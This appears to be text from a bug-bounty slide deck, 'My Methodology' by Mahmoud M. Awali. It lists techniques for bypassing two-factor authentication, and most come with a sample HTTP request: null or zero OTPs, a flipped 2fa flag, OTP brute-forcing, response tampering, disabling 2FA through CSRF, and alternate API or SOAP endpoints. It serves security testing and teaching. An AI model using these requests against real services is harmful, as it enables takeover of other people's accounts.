2

Factor
Authentication
Enter 6-Digit Code

Mahmoud M. Awali
@0xAwali
 My Methodology

attacker

Try To Send Empty OTP OR Set NULL e.g. otp=null To Bypass 2FA

● Writeup
POST /secondLogin HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":""}
 My Methodology

attacker

Try To Insert Zeros In OTP Parameter e.g. 000000 To Bypass 2FA

● Writeup
POST /secondLogin HTTP/1.1
Host: [Link]
● Slides User-Agent: Mozilla/5.0
Content-Type: application/json
● Tweet Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":"000000"}
 My Methodology

attacker

Always Notice Both Request When 2FA Is Enabled And Disabled e.g. There Is
Boolean Value True If 2FA Is Enabled Try To Change It To False To Bypass 2FA

● Tweet
POST /secondLogin HTTP/1.1
Host: [Link]
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/json
● Writeup Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","2fa":false,"otp":"****"}
 My Methodology

attacker

Enable 2FA AND Try To Log In OR Remove OTP Parameter , Sometimes

Enabled 2FA Doesn't Work

● Writeup
POST /secondLogin HTTP/1.1
Host: [Link]
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****"}
 My Methodology

attacker

Try To Append X-Forwarded-For Header e.g. X-Forwarded-For: [Link]

To Bypass 2FA

● Writeup
POST /secondLogin HTTP/1.1
Host: [Link]
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/json
● Writeup X-Forwarded-For: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":"*****"}
 My Methodology

attacker

Try To Figure Out If The Old-OTP Is Valid OR OTP Is Fixed , If YES

There Is Issue Here

● Tweet
POST /secondLogin HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":"Old-OTP"}
 My Methodology

attacker

Try To Brute Force The OTP To Bypass 2FA

● Slides
POST /secondLogin HTTP/1.1
Host: [Link]
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/json
● Writeup Referer: [Link]
Origin: [Link]
● Writeup Content-Length: Number

{"email":"me","pass":"****","otp":"FUZZ"}
 My Methodology

attacker

If There Is OTP Code Try To Brute Force By Using Race Condition Technique
OR IP Rotate Burp Suite Extension

● Writeup
POST /resetPassword HTTP/1.1
Host: [Link]
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

email=me&pass=*****&otp=*****
 My Methodology

attacker

Enter Wrong OTP Code Then Try To Manipulate The Response To Change The
Response To Response Of The Correct OTP Code To Bypass 2FA

● Slides HTTP/1.1 200 OK

Access-Control-Allow-Origin: [Link]
● Slides Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length
● Writeup
{
● Blog "code" : "correct otp"
"token" : "Random String"
}
 My Methodology

attacker

Try To Login With OAuth , If There Is 2FA While Entering Email And
Password To Bypass 2FA

● Writeup
Steps to produce :-

1 - Log In With Valid Email and Password

2 - You Will Ask About OTP
3 - Try To Log In With OAuth
4 - You Will Access Your Account Without 2FA
 My Methodology

attacker

Try To Use OTP Of Another Account e.g. Your Second Account To Bypass 2FA

● Writeup
POST /secondLogin HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****","otp":"Your-OTP"}
 My Methodology

attacker

Try To Disable 2FA With CSRF e.g. Disable 2FA In Account One , Use This
Request To Disable 2FA In Account Two By Using CSRF POC

● Slides
POST /setting HTTP/1.1
Host: [Link]
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/json
● Writeup Referer: [Link]
Origin: [Link]
● Tweet Content-Length: Number

{"action":"disable_2fa"}
 My Methodology

attacker

If There Isn't Verifying Email Try To Sign up With Victim Email , And Log In
With his Email AND Password Then Enabled 2FA

● Writeup
POST /setting HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"action":"enable_2fa"}
 My Methodology

attacker

Try To Figure Out Others Endpoints To Do The Same Action That Does Not
Require 2FA e.g. API Endpoints To Bypass 2FA

● Writeup
POST /apiLogin HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: [Link]
Origin: [Link]
Content-Length: Number

{"email":"me","pass":"****"}
 My Methodology

attacker

If There Is Endpoint To Generate Backup Codes Try To POST To It Directly e.g.

POST /generateBackup After Inserting Email And Password

● Blog
Steps to produce :-

1 - Logged In With Valid Email and Password

2 - Provided The Wrong OTP Code
3 - Captured The Request With Burp Suite
4 - Change Request To POST /generateBackup HTTP/1.1
5 - Change Body To {"action":"backup_codes"}
 My Methodology

attacker

Try To Use SOAP Endpoint To Bypass 2FA e.g. There Is Endpoint Accept SOAP ,
Try To Send SOAP Body Without OTP Code With Valid Email AND Password

● Tweet POST /secondLogin HTTP/1.1

Host: [Link]
Content-Type: application/xml
Content-Length: Number

<SOAP-ENV:Envelope>
<SOAP-ENV:Body>
<email>me</email>
<pass>*******</pass>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
 My Methodology

attacker

Try To Sign Up , Try Use Your confirmation Link Of Email If Doesn't Expire
Multiple Times To Bypass 2FA

● Blog
Steps to produce :-

1 - Sign Up With Email

2 - Click On Confirmation Link
3 - Enable 2FA
4 - After 24 Hours , Click Again On Confirmation Link
5 - Is There 2FA OR Not
Hack3rScr0lls ● Tweet #BugBounty #BugBountyTip
 Thank
You
Mahmoud M. Awali
@0xAwali